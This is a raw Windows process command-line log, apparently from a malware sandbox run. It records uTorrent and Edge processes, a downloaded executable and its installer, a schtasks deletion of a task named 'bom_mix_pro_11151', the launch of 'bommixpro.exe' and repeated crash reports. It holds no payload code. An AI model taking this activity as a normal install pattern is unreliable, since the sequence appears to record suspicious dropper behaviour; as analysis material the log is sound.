"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=2776.3304.11164077774771384500

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x1b8,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1716,13157676356393165352,13459174796162396494,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1776 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1716,13157676356393165352,13459174796162396494,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2064 /prefetch:3

C:\Users\Admin\AppData\Roaming\uTorrent\helper\helper.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\helper\helper.exe" 10702 --hval 8nyQ3yqfzwaO9Vu5 -- -pid 2008 -version 47142

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=4576 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=4476 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7072 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=6096 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2848 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6256 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=4248 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7752 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7404 /prefetch:1

C:\Users\Admin\Downloads\the-longing-codex_m4vY1NvSZ8\the-longing-codex_m4vY1NvSZ8.exe

"C:\Users\Admin\Downloads\the-longing-codex_m4vY1NvSZ8\the-longing-codex_m4vY1NvSZ8.exe"

C:\Users\Admin\AppData\Local\Temp\is-7H7JR.tmp\is-D5VUR.tmp

"C:\Users\Admin\AppData\Local\Temp\is-7H7JR.tmp\is-D5VUR.tmp" /SL4 $305FA "C:\Users\Admin\Downloads\the-longing-codex_m4vY1NvSZ8\the-longing-codex_m4vY1NvSZ8.exe" 6384938 52224

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "bom_mix_pro_11151"

C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe

"C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe" e6bb0bd45a3f81f477172f8405ad4523

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 868

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1136

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 984

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1200

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1680

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1732

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1948

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1996

C:\Windows\SysWOW64\WerFault.exe

